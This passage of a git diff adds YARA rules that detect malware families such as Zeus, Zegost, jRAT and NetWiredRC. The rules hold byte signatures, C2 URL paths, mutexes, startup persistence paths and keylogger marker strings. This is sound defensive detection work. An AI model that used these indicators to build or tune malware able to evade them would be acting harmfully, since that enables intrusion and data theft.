+ meta:
+ description = "Yayih"
+ author = "Seth Hardy"
+ last_modified = "2014-07-11"
+
+ condition:
+ YayihCode or YayihStrings
+}
+
diff --git a/malware/Zegost.yar b/malware/Zegost.yar
new file mode 100644
index 0000000..fe68501
--- /dev/null
+++ b/malware/Zegost.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Zegost : Trojan
+{
+ meta:
+ author="Kevin Falcoz"
+ date="10/06/2013"
+ description="Zegost Trojan"
+
+ strings:
+ $signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
+ $signature2={00 BA DA 22 51 42 6F 6D 65 00}
+
+ condition:
+ $signature1 and $signature2
+}
diff --git a/malware/Zeus.yar b/malware/Zeus.yar
new file mode 100644
index 0000000..3a90837
--- /dev/null
+++ b/malware/Zeus.yar
@@ -0,0 +1,25 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Windows_Malware : Zeus_1134
+ {
+ meta:
+ author = "Xylitol xylitol@malwareint.com"
+ date = "2014-03-03"
+ description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
+ reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
+
+ strings:
+ $mz = {4D 5A}
+ $protocol1 = "X_ID: "
+ $protocol2 = "X_OS: "
+ $protocol3 = "X_BV: "
+ $stringR1 = "InitializeSecurityDescriptor"
+ $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
+ condition:
+ ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
+ }
diff --git a/malware/cxpid.yar b/malware/cxpid.yar
new file mode 100644
index 0000000..f2faaa7
--- /dev/null
+++ b/malware/cxpid.yar
@@ -0,0 +1,49 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule cxpidStrings : cxpid Family
+{
+ meta:
+ description = "cxpid Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ strings:
+ $ = "/cxpid/submit.php?SessionID="
+ $ = "/cxgid/"
+ $ = "E21BC52BEA2FEF26D005CF"
+ $ = "E21BC52BEA39E435C40CD8"
+ $ = " -,L-,O+,Q-,R-,Y-,S-"
+
+ condition:
+ any of them
+}
+
+rule cxpidCode : cxpid Family
+{
+ meta:
+ description = "cxpid code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ strings:
+ $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
+
+ condition:
+ any of them
+}
+
+rule cxpid : Family
+{
+ meta:
+ description = "cxpid"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ condition:
+ cxpidCode or cxpidStrings
+}
diff --git a/malware/favorite.yar b/malware/favorite.yar
new file mode 100644
index 0000000..5e3740a
--- /dev/null
+++ b/malware/favorite.yar
@@ -0,0 +1,38 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FavoriteCode : Favorite Family
+{
+ meta:
+ description = "Favorite code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-24"
+
+ strings:
+ // standard string hiding
+ $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
+ $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
+
+ condition:
+ any of them
+}
+
+rule FavoriteStrings : Favorite Family
+{
+ meta:
+ description = "Favorite Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-24"
+
+ strings:
+ $string1 = "!QAZ4rfv"
+ $file1 = "msupdater.exe"
+ $file2 = "FAVORITES.DAT"
+
+ condition:
+ any of ($string*) or all of ($file*)
+}
diff --git a/malware/iexpl0ree.yar b/malware/iexpl0ree.yar
new file mode 100644
index 0000000..274ad13
--- /dev/null
+++ b/malware/iexpl0ree.yar
@@ -0,0 +1,66 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule iexpl0reCode : iexpl0ree Family
+{
+ meta:
+ description = "iexpl0re code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-21"
+
+ strings:
+ $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
+ $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
+ $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
+ $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
+ // 88h decrypt
+ $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+ $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+
+ condition:
+ any of them
+}
+
+rule iexpl0reStrings : iexpl0re Family
+{
+ meta:
+ description = "Strings used by iexpl0re"
+ author = "Seth Hardy"
+ last_modified = "2014-07-21"
+
+ strings:
+ $ = "%USERPROFILE%\\IEXPL0RE.EXE"
+ $ = "\"<770j (("
+ $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
+ $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
+ $ = "LoaderV5.dll"
+ // stage 2
+ $ = "POST /index%0.9d.asp HTTP/1.1"
+ $ = "GET /search?n=%0.9d&"
+ $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
+ $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
+ $ = "BASTARD_&&_BITCHES_%0.8x"
+ $ = "c:\\bbb\\eee.txt"
+
+ condition:
+ any of them
+
+}
+
+rule iexpl0re : Family
+{
+ meta:
+ description = "iexpl0re family"
+ author = "Seth Hardy"
+ last_modified = "2014-07-21"
+
+ condition:
+ iexpl0reCode or iexpl0reStrings
+
+}
+
+
diff --git a/malware/jRAT.yar b/malware/jRAT.yar
new file mode 100644
index 0000000..24d5f21
--- /dev/null
+++ b/malware/jRAT.yar
@@ -0,0 +1,23 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+rule jRAT_conf : rat
+{
+ meta:
+ description = "jRAT configuration"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-10-11"
+ filetype = "memory"
+ version = "1.0"
+ ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py"
+ ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html"
+
+ strings:
+ $a = /port=[0-9]{1,5}SPLIT/
+
+ condition:
+ $a
+}
diff --git a/malware/naspyupdate.yar b/malware/naspyupdate.yar
new file mode 100644
index 0000000..bcce7ab
--- /dev/null
+++ b/malware/naspyupdate.yar
@@ -0,0 +1,51 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule nAspyUpdateCode : nAspyUpdate Family
+{
+ meta:
+ description = "nAspyUpdate code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ strings:
+ // decryption loop in dropper
+ $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
+
+ condition:
+ any of them
+}
+
+rule nAspyUpdateStrings : nAspyUpdate Family
+{
+ meta:
+ description = "nAspyUpdate Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ strings:
+ $ = "\\httpclient.txt"
+ $ = "password <=14"
+ $ = "/%ldn.txt"
+ $ = "Kill You\x00"
+
+ condition:
+ any of them
+}
+
+rule nAspyUpdate : Family
+{
+ meta:
+ description = "nAspyUpdate"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ condition:
+ nAspyUpdateCode or nAspyUpdateStrings
+}
+
+
diff --git a/malware/netwiredRC.yar b/malware/netwiredRC.yar
new file mode 100644
index 0000000..53c7d11
--- /dev/null
+++ b/malware/netwiredRC.yar
@@ -0,0 +1,48 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+rule NetWiredRC_B : rat
+{
+ meta:
+ description = "NetWiredRC"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2014-12-23"
+ filetype = "memory"
+ version = "1.1"
+
+ strings:
+ $mutex = "LmddnIkX"
+
+ $str1 = "%s.Identifier"
+ $str2 = "%d:%I64u:%s%s;"
+ $str3 = "%s%.2d-%.2d-%.4d"
+ $str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+ $str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
+
+ $klg1 = "[Backspace]"
+ $klg2 = "[Enter]"
+ $klg3 = "[Tab]"
+ $klg4 = "[Arrow Left]"
+ $klg5 = "[Arrow Up]"
+ $klg6 = "[Arrow Right]"
+ $klg7 = "[Arrow Down]"
+ $klg8 = "[Home]"
+ $klg9 = "[Page Up]"
+ $klg10 = "[Page Down]"
+ $klg11 = "[End]"
+ $klg12 = "[Break]"
+ $klg13 = "[Delete]"
+ $klg14 = "[Insert]"
+ $klg15 = "[Print Screen]"
+ $klg16 = "[Scroll Lock]"
+ $klg17 = "[Caps Lock]"
+ $klg18 = "[Alt]"
+ $klg19 = "[Esc]"
+ $klg20 = "[Ctrl+%c]"
+
+ condition:
+ $mutex or (1 of ($str*) and 1 of ($klg*))
+}